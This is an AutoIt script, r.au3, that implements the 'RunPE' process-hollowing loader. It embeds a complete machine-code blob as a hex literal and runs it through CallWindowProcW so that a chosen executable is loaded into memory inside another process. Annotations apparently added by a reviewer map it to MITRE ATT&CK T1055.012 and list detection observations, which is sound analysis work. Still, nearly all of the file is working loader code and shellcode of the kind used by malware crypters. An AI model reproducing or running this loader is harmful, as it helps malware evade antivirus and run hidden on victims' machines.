r.au3
; Usage: RunPE(Path, $binary)
; Script entry point: reads the file named by the hard-coded $yourfile path
; and hands both the path and the file contents to RunPE() below.
; The path points into a VirtualBox shared folder on drive o: (presumably the
; author's test VM; it is specific to that environment).
$yourfile="o:\amur\VirtualBox\SHARED FOLDER\1.exe"
; Whole file is read into $binary; the result of fileread is not checked.
$binary=fileread($yourfile)
RunPE($yourfile,$binary)
; RunPE($path, $filebin)
;   Copies an embedded machine-code blob ($ASM) and the caller-supplied file
;   contents ($filebin) into two DllStruct byte buffers, then calls
;   user32!CallWindowProcW with the blob's address as the "previous window
;   procedure" argument, so the blob is invoked as native code.
;
;   Parameters:
;     $path    - passed to the blob as a wide string ("wstr").
;     $filebin - data copied into $binBuffer; the blob receives a pointer to it.
;   Returns: nothing explicit. The DllCall result is stored in $Ret and never
;            inspected, and @error is not checked.
;
;   NOTE(review): the function name and the call shape match the in-memory PE
;   loader pattern usually called "RunPE" / process hollowing (MITRE ATT&CK
;   T1055.012). The blob is opaque in this listing; confirm what it does by
;   disassembling it in an isolated analysis environment.
;
;   Detection-relevant observations from the visible code:
;     - An AutoIt script passes a pointer to a data buffer as the function
;       pointer of CallWindowProcW, i.e. native code is run without any
;       executable file of its own on disk.
;     - The first bytes of the blob contain the UTF-16 strings "kernel32" and
;       "ntdll". No other API names are readable in clear text, so imports are
;       presumably resolved at run time (by hash; verify in disassembly).
;     - The constant hex run is a candidate for a content signature on script
;       files and on decompiled AutoIt binaries.
Func RunPE($path,$filebin)
; Machine code as a "0x..." hex literal, assembled in pieces with &=.
local $ASM = "0x60E84E0000006B00650072006E0065006C00330032000000 6E00740064006C006C00000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000005B8BFC6A42E8BB0300008B54242889 118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E 6A3CE89D0300006A2268F4000000E8910300006A266A24E888 0300006A2A6A40E87F030000"
$ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C 0300008B09C701440000006A12E84D030000685BE814CF51E8 790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF 31FFD06A12E823030000685BE814CF51E84F0300006A1EE811 0300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200 008B0968F80000005751FFD06A00E8E80200006888FEB31651 E8140300006A2EE8D60200"
$ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A00 6A046A006A006A006A00FF31FFD06A12E8A902000068D03710 F251E8D50200006A22E8970200008B116A2EE88E0200008B09 FF7234FF31FFD06A00E87E020000689C951A6E51E8AA020000 6A22E86C0200008B118B396A2EE8610200008B096A40680030 0000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E 0200008B396A3EE8350200"
$ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF7754 56FF7034FF316A00E81002000068A16A3DD851E83C02000083 C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8 E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8 CE010000C70100000000B8280000006A36E8BC010000F7216A 1EE8B30100008B118B523C81C2F800000003D06A3EE89F0100 0003116A26E8960100006A"
$ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40C FFD06A26E8730100008B398B098B71146A3EE8650100000331 6A26E85C0100008B098B510C6A22E8500100008B090351346A 46E8440100008BC16A2EE83B0100008B0950FF77105652FF31 6A00E82A01000068A16A3DD851E85601000083C40CFFD06A36 E8130100008B1183C20189116A3AE8050100008B093BCA0F85 33FFFFFF6A32E8F4000000"
$ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100 006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD0 6A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400 000083C6086A2EE89D0000008B116A46E894000000516A0457 56FF326A00E88600000068A16A3DD851E8B200000083C40CFF D06A22E86F0000008B098B51280351346A32E8600000008B09 81C1B000000089116A00E8"
$ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A 2EE8340000008B09FF32FF7104FFD06A00E82400000068883F 4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8 040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CA AF9151E81E0000006A406800100000FF7424186A00FFD0FF74 2414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E8 4B00000083C408FF742404"
$ASM &= "FFD0FF74240850E83800000083C408C355525153565733C064 8B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B 7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B 6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE3 30498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B 7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F 5E5B595A5DC3C300000000"
; Two byte-array structs, each sized with BinaryLen() of its source value.
Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
Local $binBuffer=DllStructCreate("byte[" & BinaryLen($filebin) & "]")
; Fill the structs: code blob into $BufferASM, target file bytes into $binBuffer.
DllStructSetData($BufferASM, 1, $ASM)
DllStructSetData($binBuffer, 1, $filebin)
; CallWindowProcW calls the address given as its first argument. Here that
; address is the code buffer, so the remaining arguments ($Path, the pointer to
; the file bytes, and two zero ints) become the blob's parameters.
Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
"ptr", DllStructGetPtr($BufferASM), _
"wstr", ($Path), _
"ptr", DllStructGetPtr($binBuffer), _
"int", 0, _
"int", 0)
EndFunc